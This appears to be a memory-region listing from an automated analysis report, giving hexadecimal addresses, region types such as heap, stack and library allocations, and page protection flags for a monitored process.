7FFB0C411000
unkown
page execute and read and write
1FC24F4E000
heap
page read and write
1E0D7EA0000
direct allocation
page read and write
1C550063000
heap
page read and write
1DEE7CBB000
heap
page read and write
267A7710000
heap
page read and write
20D43B0D000
heap
page read and write
1FC25607000
heap
page read and write
267AA622000
trusted library allocation
page read and write
7FF6DC744000
unkown
page readonly
1FC25626000
heap
page read and write
1E0E15BD000
heap
page read and write
281FE184000
heap
page read and write
1E5FA76B000
heap
page read and write
2DE1CEE4000
heap
page read and write
1E5FA778000
heap
page read and write
270D27D3000
heap
page read and write
1DD0FAC8000
heap
page read and write
1E0D645F000
heap
page read and write
1E0D6465000
heap
page read and write
20D43AFE000
heap
page read and write
239E7E21000
trusted library allocation
page read and write
4C53DFE000
stack
page read and write
2BA9E640000
heap
page read and write
15764FE000
stack
page read and write
267A9FD6000
trusted library allocation
page read and write
1C55076A000
heap
page read and write
236408F9000
heap
page read and write
7FF6DC73E000
unkown
page write copy
1FC2613B000
heap
page read and write
1CEF20AC000
heap
page read and write
1FC25E7E000
heap
page read and write
1407C84F000
heap
page read and write
281FC51A000
heap
page read and write
1EA230F0000
heap
page read and write
23AC5C40000
heap
page read and write
D8D53FF000
unkown
page read and write
23097CA0000
heap
page read and write
1690F74D000
heap
page read and write
1FC25C54000
direct allocation
page read and write
1CEF3F73000
heap
page read and write
7FFB0C59E000
unkown
page execute and read and write
B08A8FF000
unkown
page read and write
266F50E0000
heap
page read and write
239F67D7000
trusted library allocation
page read and write
1AD18AA0000
heap
page read and write
1C550050000
heap
page read and write
15C99C40000
heap
page read and write
1FC25331000
heap
page read and write
1DCE30D0000
heap
page read and write
1CEF20B8000
heap
page read and write
26A1C540000
heap
page read and write
1FC256BE000
heap
page read and write
7FFAA96BC000
trusted library allocation
page read and write
1C55201E000
heap
page read and write
1FC25336000
heap
page read and write
239E489D000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1FC24EDE000
heap
page read and write
B26CE7F000
stack
page read and write
7FFAA937B000
trusted library allocation
page execute and read and write
267C1870000
heap
page read and write
2484A45A000
heap
page read and write
19BC6521000
heap
page read and write
1DD0C80B000
heap
page read and write
1FC24F4F000
heap
page read and write
1FC2613B000
heap
page read and write
165335ED000
heap
page read and write
267C16A6000
heap
page read and write
1FC253D5000
heap
page read and write
51D4A7C000
stack
page read and write
1DD0C807000
heap
page read and write
1C55201D000
heap
page read and write
1690F727000
heap
page read and write
1E5FA994000
heap
page read and write
7FFB0D742000
unkown
page readonly
29AC234B000
heap
page read and write
8F952FF000
stack
page read and write
7FFAA9531000
trusted library allocation
page read and write
7FFAA95A0000
trusted library allocation
page read and write
1DD0FAC9000
heap
page read and write
7FFB0D742000
unkown
page readonly
1E0D99E0000
direct allocation
page read and write
23AC79EE000
heap
page read and write
1E0D65F0000
heap
page read and write
23AC6118000
heap
page read and write
1FC25494000
heap
page read and write
266F36AB000
heap
page read and write
281FC409000
heap
page read and write
2484A809000
heap
page read and write
23AC6129000
heap
page read and write
83C6DFF000
unkown
page read and write
1AB5E297000
heap
page read and write
1FC2555E000
heap
page read and write
1407C040000
trusted library allocation
page read and write
1FC22D24000
heap
page read and write
1C550057000
heap
page read and write
281FE184000
heap
page read and write
1C5500B5000
heap
page read and write
2484A154000
heap
page read and write
1E181D00000
heap
page read and write
266F3083000
heap
page read and write
1E0E15D6000
heap
page read and write
270D2020000
heap
page read and write
8BBBAFF000
stack
page read and write
19BC6521000
heap
page read and write
7FFAA9534000
trusted library allocation
page read and write
1DCE30E2000
heap
page read and write
1AB5E279000
heap
page read and write
24BA3988000
heap
page read and write
1BCD0DA0000
heap
page read and write
266F4F51000
heap
page read and write
1FC24EE2000
heap
page read and write
17FCF062000
heap
page read and write
1E0D9900000
direct allocation
page read and write
76BB4FE000
stack
page read and write
1407C750000
trusted library allocation
page read and write
7FFB0C290000
unkown
page readonly
1C550777000
heap
page read and write
1407B1D0000
trusted library allocation
page read and write
267C16F0000
heap
page execute and read and write
1FC25612000
heap
page read and write
26A1C7C0000
heap
page read and write
1E0E161F000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1CEF2594000
heap
page read and write
1FC25359000
heap
page read and write
1A2CE3C7000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
1909D570000
heap
page read and write
1FC25621000
heap
page read and write
270D2180000
heap
page read and write
23AC6135000
heap
page read and write
1E0E1596000
heap
page read and write
1C550770000
heap
page read and write
2CFD3AF000
stack
page read and write
1FC24F4C000
heap
page read and write
26A1C4A0000
heap
page read and write
135F0490000
heap
page read and write
A42D1EC000
stack
page read and write
7FFB1E47C000
unkown
page read and write
2DE1CB20000
heap
page read and write
239FECB0000
heap
page read and write
7FFB0B805000
unkown
page execute and write copy
1FC2535B000
heap
page read and write
1FC256B8000
heap
page read and write
1FC25402000
heap
page read and write
2322B41D000
heap
page read and write
C6030FF000
stack
page read and write
2322B41B000
heap
page read and write
1DD0EADC000
heap
page read and write
1FC24ECD000
heap
page read and write
1E0E2F94000
heap
page read and write
7FFAA9570000
trusted library allocation
page execute and read and write
23AC5B5C000
heap
page read and write
1FC22D1B000
heap
page read and write
2BA38B18000
heap
page read and write
1CEF25B9000
heap
page read and write
29AC2484000
heap
page read and write
239E4810000
heap
page read and write
1E8E34FB000
trusted library allocation
page read and write
1E8E41DD000
heap
page read and write
26379D80000
heap
page read and write
1DD0E9AB000
heap
page read and write
7FFB0B810000
unkown
page readonly
25D4E154000
heap
page read and write
76BB5FD000
stack
page read and write
1FC25652000
heap
page read and write
266F3066000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
15763FE000
unkown
page readonly
A42D4FF000
unkown
page read and write
92C15EF000
stack
page read and write
1FC25686000
heap
page read and write
281FC3EC000
heap
page read and write
82521BF000
stack
page read and write
281FC333000
heap
page read and write
27E84C80000
heap
page read and write
239E48F2000
heap
page read and write
1A2CE3D0000
heap
page read and write
1E0E162B000
heap
page read and write
28425C60000
heap
page read and write
7FFB0C291000
unkown
page execute read
28425E36000
heap
page read and write
7FF6DC72B000
unkown
page readonly
1407BD01000
trusted library allocation
page read and write
23195FC9000
heap
page read and write
281FC315000
heap
page read and write
26379E71000
heap
page read and write
51C2CFF000
unkown
page read and write
28425E10000
heap
page read and write
1EA23120000
heap
page read and write
2484C18E000
heap
page read and write
1E0D64B7000
heap
page read and write
7FFB0C5B3000
unkown
page execute and read and write
1DEE7CBB000
heap
page read and write
1CEF20A7000
heap
page read and write
281FC331000
heap
page read and write
1FC24E7D000
heap
page read and write
1C55076E000
heap
page read and write
1E0D64B9000
heap
page read and write
1FC26135000
heap
page read and write
7FFB0C5C1000
unkown
page execute and read and write
1E8E3FF4000
heap
page read and write
1CE58900000
heap
page read and write
1C550030000
heap
page read and write
2C25EE10000
heap
page read and write
1FC2568B000
heap
page read and write
266F3077000
heap
page read and write
1E0D9B21000
direct allocation
page read and write
7FF6DC72B000
unkown
page readonly
1E0E15AF000
heap
page read and write
7FFAA9720000
trusted library allocation
page read and write
1E0D67D0000
heap
page read and write
1FC256CA000
heap
page read and write
1FC2537B000
heap
page read and write
1FC2569C000
heap
page read and write
13C87890000
heap
page read and write
7FFB0BFE6000
unkown
page execute and write copy
1FC252DB000
heap
page read and write
281FE17E000
heap
page read and write
267A7752000
heap
page read and write
202E5974000
heap
page read and write
1C5500B8000
heap
page read and write
1E0E1626000
heap
page read and write
270D220F000
heap
page read and write
1E8E34F9000
trusted library allocation
page read and write
23AC5C4E000
heap
page read and write
1E8E41D0000
heap
page read and write
1C550799000
heap
page read and write
1FC252B9000
heap
page read and write
1E8E3FF4000
heap
page read and write
1FC22D89000
heap
page read and write
20D43AF7000
heap
page read and write
21B1BD00000
heap
page read and write
1FC24EA8000
heap
page read and write
135F05E7000
heap
page read and write
7FFAA935D000
trusted library allocation
page execute and read and write
1CEF25A9000
heap
page read and write
17FCF04B000
heap
page read and write
1DD0FA5C000
heap
page read and write
267AA761000
trusted library allocation
page read and write
1E8E3FD0000
heap
page read and write
23DC4040000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1FC252A2000
heap
page read and write
1E4CFA0F000
heap
page read and write
51D457F000
stack
page read and write
1DD0C719000
heap
page read and write
2484A152000
heap
page read and write
266F3094000
heap
page read and write
7FFB0B807000
unkown
page read and write
1FC25870000
direct allocation
page read and write
1C5507A5000
heap
page read and write
83C6CFB000
stack
page read and write
27E84FF4000
heap
page read and write
1E0D9BA0000
direct allocation
page read and write
266F36E9000
heap
page read and write
7FFB0C5B7000
unkown
page read and write
2484A48E000
heap
page read and write
239E7395000
trusted library allocation
page read and write
1DD0C760000
heap
page read and write
14000000000
trusted library allocation
page read and write
28425DD0000
heap
page read and write
244EE070000
heap
page read and write
2484A172000
heap
page read and write
270D226A000
heap
page read and write
266F3091000
heap
page read and write
239E7D72000
trusted library allocation
page read and write
23AC5C4D000
heap
page read and write
26395B97000
heap
page read and write
266F4F54000
heap
page read and write
1E0E1730000
heap
page read and write
165335FA000
heap
page read and write
1909D370000
heap
page read and write
E0907FF000
stack
page read and write
1690F72C000
heap
page read and write
1FC25631000
heap
page read and write
2484C181000
heap
page read and write
1AB5E258000
heap
page read and write
1FC24F05000
heap
page read and write
1FC25F7F000
heap
page read and write
29AC2357000
heap
page read and write
1CEF2094000
heap
page read and write
1DCE2F80000
heap
page read and write
7E7A7FE000
stack
page read and write
1DD0C80A000
heap
page read and write
1407C861000
heap
page read and write
2BA9E6C0000
heap
page read and write
202E5610000
heap
page read and write
239E48DA000
heap
page read and write
7FFB0BFAC000
unkown
page execute and read and write
21B1BC20000
heap
page read and write
776F8FC000
stack
page read and write
1FC25368000
heap
page read and write
1407C790000
trusted library allocation
page read and write
1CEF20BE000
heap
page read and write
1E0E30A4000
heap
page read and write
2322B5E0000
heap
page read and write
1CEF25B0000
heap
page read and write
1FC25616000
heap
page read and write
1CEF3F7E000
heap
page read and write
266F36A7000
heap
page read and write
9A864FF000
stack
page read and write
1CEF2085000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
1B3A8330000
heap
page read and write
7FFB1C3C1000
unkown
page readonly
1B3A8250000
heap
page read and write
1CEF2097000
heap
page read and write
1E0E161F000
heap
page read and write
1407BB1A000
heap
page read and write
1DCE30F2000
heap
page read and write
267A7840000
trusted library allocation
page read and write
1BCD0E4D000
heap
page read and write
157707E000
stack
page read and write
1E8E41C6000
heap
page read and write
7FFB0C43B000
unkown
page execute and write copy
17FCEFD0000
heap
page read and write
1FC25F7C000
heap
page read and write
7FFB1BB2A000
unkown
page execute and read and write
1E8E352F000
trusted library allocation
page read and write
1DD0EAD9000
heap
page read and write
C063AFC000
stack
page read and write
1FC2533A000
heap
page read and write
1C5500F1000
heap
page read and write
87BFDE8000
stack
page read and write
7FFB1BB11000
unkown
page execute and read and write
23AC5B66000
heap
page read and write
1FC2567E000
heap
page read and write
281FC3FB000
heap
page read and write
135F05F9000
heap
page read and write
EB4CAFC000
stack
page read and write
1FC25543000
heap
page read and write
1FC24F55000
heap
page read and write
1E7B6140000
heap
page read and write
266F36CF000
heap
page read and write
1E8E4043000
heap
page read and write
1C55079A000
heap
page read and write
281FC31F000
heap
page read and write
1690F750000
heap
page read and write
81D23AE000
stack
page read and write
1FC246E4000
heap
page read and write
20C72ED0000
heap
page read and write
2484A173000
heap
page read and write
15C99A20000
heap
page read and write
1FC25686000
heap
page read and write
270D2185000
heap
page read and write
1C5500AD000
heap
page read and write
15765FE000
unkown
page readonly
1CEF20A4000
heap
page read and write
E0906FE000
unkown
page read and write
C0388FF000
stack
page read and write
2BA9E6CB000
heap
page read and write
1C550778000
heap
page read and write
7FFAA9540000
trusted library allocation
page execute and read and write
26379E68000
heap
page read and write
23AC6100000
heap
page read and write
1E0D6610000
heap
page read and write
1CEF2684000
heap
page read and write
270D2233000
heap
page read and write
270D4054000
heap
page read and write
1FC25F88000
heap
page read and write
239E7E12000
trusted library allocation
page read and write
1FC25368000
heap
page read and write
7FFB0C440000
unkown
page readonly
266F36BF000
heap
page read and write
266F36E0000
heap
page read and write
8F1C4FE000
stack
page read and write
C6859FF000
stack
page read and write
1FC25607000
heap
page read and write
1C550111000
heap
page read and write
2484A7EC000
heap
page read and write
1FC255AF000
heap
page read and write
1FC2533A000
heap
page read and write
24BA38C0000
heap
page read and write
267B93FF000
trusted library allocation
page read and write
7FFB0B899000
unkown
page execute and read and write
1DD0FA81000
heap
page read and write
1E0D644F000
heap
page read and write
1407B213000
heap
page read and write
1C28EFC000
stack
page read and write
1CEF2234000
heap
page read and write
266F30AD000
heap
page read and write
1FC24E8D000
heap
page read and write
1FC22D23000
heap
page read and write
20D43B01000
heap
page read and write
1C552011000
heap
page read and write
1BCD1064000
heap
page read and write
1DD0E244000
heap
page read and write
1FC25635000
heap
page read and write
1E8E37D0000
trusted library allocation
page read and write
20C72EC0000
heap
page read and write
2B526730000
heap
page read and write
1E8E4052000
heap
page read and write
1CEF3F7F000
heap
page read and write
266F36B8000
heap
page read and write
1E0D7EBB000
direct allocation
page read and write
22972EC2000
heap
page read and write
1FC25F7C000
heap
page read and write
1AD18A90000
heap
page read and write
1700B810000
heap
page read and write
23AC5B66000
heap
page read and write
270D245B000
heap
page read and write
20D43CA0000
heap
page read and write
1DEE7CAC000
heap
page read and write
1DD0C80A000
heap
page read and write
1CEF2040000
heap
page read and write
2BA9E650000
heap
page read and write
1DD0C6A0000
heap
page read and write
7FFAA9630000
trusted library allocation
page read and write
1E0D6465000
heap
page read and write
270D218A000
heap
page read and write
1AB5E283000
heap
page read and write
1407B27B000
heap
page read and write
1EA2311F000
heap
page read and write
1E0E157B000
heap
page read and write
1E0D64E1000
heap
page read and write
E462FF000
unkown
page read and write
1690F726000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
266F36DC000
heap
page read and write
2484A137000
heap
page read and write
1E8E34FE000
trusted library allocation
page read and write
267AA61E000
trusted library allocation
page read and write
20D43AB0000
heap
page read and write
270D27D5000
heap
page read and write
15C99A24000
heap
page read and write
1E0D643F000
heap
page read and write
28425D60000
heap
page read and write
267B9131000
trusted library allocation
page read and write
579B1FF000
stack
page read and write
1E0E30AE000
heap
page read and write
270D245E000
heap
page read and write
17FCF040000
heap
page read and write
1FC24E71000
heap
page read and write
1E0E2FAE000
heap
page read and write
1CEF25B7000
heap
page read and write
7FFB0C351000
unkown
page execute and read and write
1FC25556000
heap
page read and write
1FC24F4C000
heap
page read and write
9F33BFF000
unkown
page read and write
1E0E2FAA000
heap
page read and write
266F3204000
heap
page read and write
1FC25F7C000
heap
page read and write
2584DAE0000
heap
page read and write
23AC612A000
heap
page read and write
7FFB0B6F0000
unkown
page readonly
1AD18B31000
heap
page read and write
1E0E15D6000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
81CDF7E000
stack
page read and write
E463FF000
stack
page read and write
17FCF062000
heap
page read and write
22972EB8000
heap
page read and write
270D2187000
heap
page read and write
24B86940000
heap
page read and write
19DD4EF0000
heap
page read and write
1AB5E2A3000
heap
page read and write
1E0E1629000
heap
page read and write
7FFAA9360000
trusted library allocation
page read and write
270D27BF000
heap
page read and write
26395BB0000
heap
page read and write
1FC24EF5000
heap
page read and write
1C5500B2000
heap
page read and write
19DD4E70000
heap
page read and write
1FC252E7000
heap
page read and write
23AC5B65000
heap
page read and write
1E4CFA12000
heap
page read and write
281FE170000
heap
page read and write
A2D7D7F000
stack
page read and write
1FC256BE000
heap
page read and write
1E0D6465000
heap
page read and write
8F79A7E000
stack
page read and write
1CE586C0000
heap
page read and write
1DCE32C0000
heap
page read and write
1C550799000
heap
page read and write
281FC270000
trusted library allocation
page read and write
7FFAA950A000
trusted library allocation
page read and write
CB1DDFF000
stack
page read and write
93AF5FF000
unkown
page read and write
C0387FF000
unkown
page read and write
266F36CF000
heap
page read and write
1FC25523000
heap
page read and write
8F1C47F000
stack
page read and write
1DD0FAA1000
heap
page read and write
270D2222000
heap
page read and write
1E0D6457000
heap
page read and write
1FC252B9000
heap
page read and write
7FFAA9560000
trusted library allocation
page read and write
1FC25D17000
heap
page read and write
1E4CFA12000
heap
page read and write
266F36DF000
heap
page read and write
1E8E4043000
heap
page read and write
281FC34E000
heap
page read and write
2584DBF4000
heap
page read and write
7FFB0D721000
unkown
page execute read
1E0E1622000
heap
page read and write
1C5500CB000
heap
page read and write
1FC25562000
heap
page read and write
1DD0E780000
heap
page read and write
1E181CF7000
heap
page read and write
1DD0EABC000
heap
page read and write
7FFB0C3C6000
unkown
page execute and read and write
239E6761000
trusted library allocation
page read and write
1FC24EE2000
heap
page read and write
236407C0000
heap
page read and write
1FC252A3000
heap
page read and write
1C55008B000
heap
page read and write
1EA24B90000
heap
page read and write
1FC255C1000
heap
page read and write
1FC25369000
heap
page read and write
270D2273000
heap
page read and write
1AB5E2A3000
heap
page read and write
1E4CF920000
heap
page read and write
26A1C7C4000
heap
page read and write
25D4E191000
heap
page read and write
23DC3E5D000
heap
page read and write
281FC51A000
heap
page read and write
23AC6132000
heap
page read and write
266F3150000
trusted library allocation
page read and write
20C72D9A000
heap
page read and write
270D2140000
trusted library allocation
page read and write
7E7A33B000
stack
page read and write
23AC5B07000
heap
page read and write
1CEF2594000
heap
page read and write
281FC333000
heap
page read and write
There are 3804 hidden memdumps, click here to show them.